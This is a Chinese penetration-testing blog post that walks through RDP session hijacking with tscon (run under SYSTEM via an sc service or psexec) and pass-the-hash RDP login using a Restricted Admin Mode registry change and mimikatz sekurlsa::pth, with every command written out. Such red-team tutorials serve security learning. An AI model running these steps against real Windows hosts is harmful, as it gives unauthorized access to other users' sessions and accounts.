<!DOCTYPE html><html lang="zh-CN"><head><meta charset="utf-8"><meta name="X-UA-Compatible" content="IE=edge"><meta name="author" content="内网渗透"><title>内网技巧-RDP劫持及利用hash登录 · 9821-zed</title><meta name="description" content="前言文章涉及的技术并不深，只是本人在学习内网过程中的记录。前段时间出差做项目时，遇到问题是 导出域内Ntds无法解出明文密码导致不能登录目标域用户RDP(有特殊原因必须上远程桌面情况下)，通过学习发现有两种方式分别是rdp会话劫持及利用hash登录Rdp可尝试解决该问题，此为记录实操过程，有不妥的之"><meta name="keywords"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="renderer" content="webkit"><link rel="stylesheet" href="/css/style.css"><link rel="stylesheet" href="/css/blog_basic.css"><link rel="stylesheet" href="/css/font-awesome.min.css"><link rel="alternate" type="application/atom+xml" title="ATOM 1.0" href="/atom.xml"><script src="/js/jquery.js"></script><meta name="generator" content="Hexo 4.2.1"></head><body><div class="sidebar animated fadeInDown"><div class="logo-title"><div class="title"><img src="/images/logo@2x.png" style="width:127px;"><h3 title=""><a href="/">9821-zed</a></h3><div class="description"><p>生活只会欺负穷人，爱情也是</p></div></div></div><ul class="social-links"></ul><div class="footer"><div class="p"> <span>© 2018 - 2020 </span><i class="fa fa-star"></i><span> 内网渗透</span></div><div class="by_farbox"><span>Powered by </span><a href="https://hexo.io/zh-cn/" target="_blank">Hexo </a><span> & </span><a href="https://github.com/mrcore/hexo-theme-Anatole-Core" target="_blank">Anatole-Core  </a></div><div class="beian"><a href="http://www.beian.miit.gov.cn/" target="_blank">活着比什么都好</a><span style="height:10px;margin-left: 10px;">|</span><img src="https://qn.jixian.io/gongan.png" style="height:10px;margin-left: 10px;position: relative;top: 1px;"><span style="margin-left: 2px;">粤公网安备 44030402003967号</span></div></div></div><div class="main"><div class="page-top animated fadeInDown"><div class="nav"><li><a href="/">首页</a></li><li><a href="/archives">归档</a></li><li><a href="/tags">标签</a></li><li><a href="/about">关于</a></li><li><a href="/guestbook">留言</a></li></div><div class="information"><div class="back_btn"><li><a class="fa fa-chevron-left" onclick="window.history.go(-1)"> </a></li></div></div></div><div class="autopagerize_page_element"><div class="content"><div class="post-page"><div class="post animated fadeInDown"><div class="post-title"><h3><a>内网技巧-RDP劫持及利用hash登录</a></h3></div><div class="post-content"><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>文章涉及的技术并不深，只是本人在学习内网过程中的记录。前段时间出差做项目时，遇到问题是 <code>导出域内Ntds无法解出明文密码导致不能登录目标域用户RDP(有特殊原因必须上远程桌面情况下)</code>，通过学习发现有两种方式分别是<code>rdp会话劫持及利用hash登录Rdp</code>可尝试解决该问题，此为记录实操过程，有不妥的之处还请各位师傅给予斧正。</p>
<h3 id="一、RDP会话劫持"><a href="#一、RDP会话劫持" class="headerlink" title="一、RDP会话劫持"></a>一、RDP会话劫持</h3><p>系统管理员和用户通常可以通过 RDP（远程桌面）协议登录指定3389服务器，<code>而攻击者可以通过可以特权提升至 SYSTEM 权限的用户，可以在不知道其他用户登录凭据的情况下，用来劫持其他用户的 RDP 会话</code>，该漏洞在2017年由以色列安全研究员Alexander Korznikov在个人博客中披露。<code>利用条件只需要获取机器system权限执行tscon命令</code>。</p>
<h4 id="利用过程-服务"><a href="#利用过程-服务" class="headerlink" title="利用过程-服务"></a>利用过程-服务</h4><p>可以通过计划任务，服务等系统自带命令获取system权限cmd命令窗口，但高版本例如Windows10的服务似乎就不能直接获取system权限cmd，但可以直接跟上tscon命令，默认情况下服务将作为SYSTEM权限运行。 <code>如果你是在攻击真实目标，最后一定要删除服务！</code></p>
<ul>
<li>quser 或者 qwinsta  查看会话id<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20201123204234-5c408bca-2d89-1.png"></li>
</ul>
<p>创建劫持用户会话的服务  <strong>等号后面有个空格!</strong></p>
<ul>
<li>sc create rdp binpath= “cmd.exe /k tscon 2 /dest:console”<br>sc qc rdp<br>sc start rdp</li>
</ul>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20201123204256-69022080-2d89-1.png"></p>
<p><code>PS：该方法优点系统自带，但稍威麻烦一点。</code></p>
<h4 id="利用过程-Psexec"><a href="#利用过程-Psexec" class="headerlink" title="利用过程-Psexec"></a>利用过程-Psexec</h4><p>相对刚刚服务来说，更推荐家中常备<a href="https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec" target="_blank" rel="noopener"><strong>Psexec</strong></a><code>微软签名正版授权(免杀杠杠的)操作简单</code>，功能强大相比Python版psexec少了哈希传递功能。 </p>
<p><code>首次使用建议 带上-accepteula参数</code>(感谢强哥) ，不然就会像这样弹窗。。。<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20201123210813-f18ece46-2d8c-1.png"></p>
<ul>
<li>psexec -s -i cmd<br>quser<br>tscon 2 /dest:console<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20201123210836-feed2178-2d8c-1.png"></li>
</ul>
<p>踩坑点:<code>记得无论是服务还是psexec都要用管理员运行cmd命令行窗口，不然会出现权限不够！</code><br>当然能获取system权限命令窗口还有其他方法，这里只记录相对简单且实用的。</p>
<h3 id="二、利用Hash登录rdp远程桌面"><a href="#二、利用Hash登录rdp远程桌面" class="headerlink" title="二、利用Hash登录rdp远程桌面"></a>二、利用Hash登录rdp远程桌面</h3><p>抓取hash无法破解的情况下，如果使用hash远程登录RDP，需要<code>开启&quot;Restricted Admin Mode&quot;</code>, 在Windows8.1和Windows Server 2012R2上默认开启。<code>本有两种开启方法第一种为打补丁，第二种为手动修改注册表，这里只介绍第二种。</code></p>
<h5 id="修改注册表"><a href="#修改注册表" class="headerlink" title="修改注册表"></a>修改注册表</h5><p>位置：HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa<br>新建DWORD键值DisableRestrictedAdmin，<code>值为0，代表开启;值为1，代表关闭</code></p>
<p>对应命令行开启Restricted Admin mode的命令如下：<br>REG ADD “HKLM\System\CurrentControlSet\Control\Lsa” /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f</p>
<p>查看是否已开启 DisableRestrictedAdmin   <code>REG_DWORD    0x0 存在就是开启 </code><br>REG query “HKLM\System\CurrentControlSet\Control\Lsa” | findstr “DisableRestrictedAdmin”<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20201124202245-c1fad10c-2e4f-1.png"></p>
<p>客户端命令行：</p>
<ul>
<li>mstsc.exe /restrictedadmin</li>
</ul>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20201124202736-6f42e48a-2e50-1.png"><br>值得注意的是 这里无法登录是因为<code>Restricted Admin mode使用当前Windows登录凭据</code>，需借助mimiketz进行pth，不需要明文密码，直接登录即可。<br><code>Server 开启Restricted Admin mode时，Client 也需要支持Restricted Admin mode，</code></p>
<p>** mimikatz 踩坑记录如下：**</p>
<p>遇到此错误 ERROR kuhl_m_sekurlsa_acquireLSA ; <code>Modules informations</code> 请检查mimiket及对应操作系统版本</p>
<p>若遇到 error kuh1_m_sekurlsa_acquireLSA:<code>logon list</code> 请下载最新版<a href="https://github.com/gentilkiwi/mimikatz/releases" target="_blank" rel="noopener">mimiketz</a></p>
<p><code>遇到CredSSP加密数据库错误是大概是因为win10家庭版</code>，做演示时俺就遇上了，于是就用2016虚拟机进行后续操作。<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20201124212408-554c09d2-2e58-1.png"></p>
<ul>
<li>mimikatz命令如下：<br>privilege::debug<br>sekurlsa::pth /user:9821 /domain:DESKTOP-6RVIHJ2 /ntlm:e5df2c988f0d77ef35a9bdc95b5 “/run:mstsc.exe /restrictedadmin”<br>执行后弹出远程登录界面，如下图 选择连接，成功实现远程登录<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20201124212009-c6cadd64-2e57-1.png"><br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20201124212757-dd935002-2e58-1.png"></li>
</ul>
<h5 id="受限管理员模式"><a href="#受限管理员模式" class="headerlink" title="受限管理员模式"></a>受限管理员模式</h5><p>受限管理员模式顾名思义,<code>只对管理员组有效</code>.所以如果你获取到的用户属于远程桌面用户组,那么是无法通过hash登录的.会提示如下的错误:<br>首先把刚刚的用户移除administrators管理组，查看该用户权限<br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20201124214402-1cf56b2a-2e5b-1.png"><br><code>这里不知道什么原因，没显示报错信息但这并不影响他无法登录的事实</code><br><img src="https://xzfile.aliyuncs.com/media/upload/picture/20201124220825-848bedf6-2e5e-1.png"></p>
<h3 id="参考："><a href="#参考：" class="headerlink" title="参考："></a>参考：</h3><p><a href="https://www.cnblogs.com/k8gege/p/13457594.html" target="_blank" rel="noopener">RDP会话劫持 Ladon无密码登陆管理员桌面会话</a><br><a href="http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html" target="_blank" rel="noopener">Passwordless RDP Session Hijacking Feature All Windows versions</a><br><a href="https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Pass-the-Hash-with-Remote-Desktop(Restricted-Admin-mode" target="_blank" rel="noopener">渗透技巧——Pass the Hash with Remote Desktop(Restricted Admin mode)</a><br><a href="https://www.freebuf.com/articles/system/15757.html" target="_blank" rel="noopener">Hash传递攻击Windows2012远程桌面</a></p>
<h2 id="后记"><a href="#后记" class="headerlink" title="后记"></a><strong>后记</strong></h2><ul>
<li>感谢给予帮助和支持的同事以及所在的白帽一百少先队，最后谢谢你</li>
<li><code>声明：本文章经用于经验及交流，严禁用于非法操作，出现后果一切自行承担，阅读此文章表示你已同意</code></li>
<li>最后希望大家不要吝啬您的批评或赞美，对我来说都是莫大的支持及鼓励!</li>
</ul>
</div><div class="post-footer"><div class="meta"><div class="info"><i class="fa fa-sun-o"></i><span class="date">2020-11-25</span><i class="fa fa-tag"></i><a class="tag" href="/tags/技巧/" title="技巧">技巧 </a><span class="leancloud_visitors"></span></div></div></div></div><div class="share"><div class="evernote"><a class="fa fa-bookmark" href="" onclick="javascript:join_favorite()" ref="sidebar"></a></div><div class="weibo"><a class="fa fa-weibo" href="javascript:void((function(s,d,e){try{}catch(e){}var f='http://service.weibo.com/share/share.php?',u=d.location.href,p=['url=',e(u),'&amp;title=',e(d.title),'&amp;appkey=2924220432'].join('');function a(){if(!window.open([f,p].join(''),'mb',['toolbar=0,status=0,resizable=1,width=620,height=450,left=',(s.width-620)/2,',top=',(s.height-450)/2].join('')))u.href=[f,p].join('');};if(/Firefox/.test(navigator.userAgent)){setTimeout(a,0)}else{a()}})(screen,document,encodeURIComponent));"></a></div><div class="twitter"><a class="fa fa-twitter" href="http://twitter.com/home?status=,http://yoursite.com/2020/11/25/内网技巧-RDP劫持及利用hash登录/,9821-zed,内网技巧-RDP劫持及利用hash登录,;" target="_blank" rel="noopener"></a></div></div><div class="pagination"><ul class="clearfix"><li class="pre pagbuttons"><a class="btn" role="navigation" href="/2020/12/07/PAM/" title="内网技巧-linuxPAM">上一篇</a></li><li class="next pagbuttons"><a class="btn" role="navigation" href="/2020/06/25/%E5%86%85%E7%BD%91%E6%89%AB%E6%8F%8F-nbtscan/" title="内网扫描之Nbtscan">下一篇</a></li></ul></div><script src="/js/visitors.js"></script><a id="comments"></a><div id="vcomments" style="margin:0 30px;"></div><script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script><script src="//cdn.jsdelivr.net/gh/xcss/valine@latest/dist/Valine.min.js"></script><script>var valine = new Valine({
  el:'#vcomments',
  notify:true || false, 
  verify:false|| false, 
  app_id:'rsRSoR5fW0Fh2Q7CvgJsm1v2-gzGzoHsz',
  app_key:'3srXHzWwmq9S19ucPADetjyI',
  placeholder:'你知道我在等你吗！',
  path: window.location.pathname,
  serverURLs: '',
  visitor:true,
  recordIP:true,
  avatar:'mm'
})</script></div></div></div></div><script src="/js/jquery-migrate-1.2.1.min.js"></script><script src="/js/jquery.appear.js"></script><script src="/js/add-bookmark.js"></script><script src="/js/baidu-tongji.js"></script></body></html>